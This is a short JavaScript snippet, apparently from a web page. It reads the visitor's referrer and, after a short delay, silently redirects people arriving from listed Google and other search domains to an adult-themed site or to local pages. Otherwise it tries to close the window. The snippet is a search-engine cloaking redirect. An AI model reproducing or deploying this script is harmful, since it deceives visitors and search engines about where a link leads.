function Weiter() {
var x = meme();
 if(x == false) top.close();
}
window.setTimeout("Weiter()",1900);

function meme() {
var refarray = new Array();
refarray['co.nz'] = "http://www.nudistbeachclub.com";
refarray['co.uk'] = "http://www.nudistbeachclub.com";
refarray['co.in'] = "http://www.nudistbeachclub.com";
refarray['co.nz'] = "http://www.nudistbeachclub.com";
refarray['com.au'] = "http://www.nudistbeachclub.com";
refarray['google.ie'] = "http://www.nudistbeachclub.com";
refarray['co.jp'] = "http://www.nudistbeachclub.com";
refarray['t-online.de'] = "../../index.html";
refarray['google.de'] = "../../index.html";
refarray['google.at'] = "../../index.html";
refarray['google.ie'] = "http://www.nudistbeachclub.com";
refarray['google.ca'] = "../nudistbeachclub.htm";
refarray['uk.search'] = "http://www.nudistbeachclub.com";
for (var i in refarray) {
if (document.referrer.indexOf(i) != -1) document.location.replace(refarray[i]);
}
}
